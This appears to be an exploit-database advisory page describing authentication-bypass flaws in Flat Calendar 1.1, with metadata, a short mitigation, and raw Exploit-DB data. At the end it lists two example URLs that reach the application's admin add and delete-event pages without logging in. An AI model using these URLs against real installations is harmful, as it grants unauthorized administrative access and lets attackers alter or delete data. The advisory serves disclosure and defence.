header-logo
Suggest Exploit
vendor:
Flat Calendar
by:
SecurityFocus
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Flat Calendar
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: N/A
Related CWE: N/A
CPE: a:flatcalendar:flat_calendar
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Flat Calendar Authentication Bypass Vulnerabilities

Flat Calendar is prone to multiple authentication-bypass vulnerabilities because it fails to perform adequate authentication checks. An attacker can exploit these issues to gain unauthorized access to the application and make arbitrary changes to its configuration. This may lead to further attacks.

Mitigation:

Ensure that authentication checks are performed properly and that access to sensitive areas of the application is restricted to authorized users.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/29662/info

Flat Calendar is prone to multiple authentication-bypass vulnerabilities because it fails to perform adequate authentication checks.

An attacker can exploit these issues to gain unauthorized access to the application and make arbitrary changes to its configuration. This may lead to further attacks.

Flat Calendar 1.1 is vulnerable; other versions may also be affected. 

http://www.example.com/calender_path/admin/add.php
http://www.example.com/calender_path/admin/deleteEvent.php?eventNumber=[EVENTNUMBERid]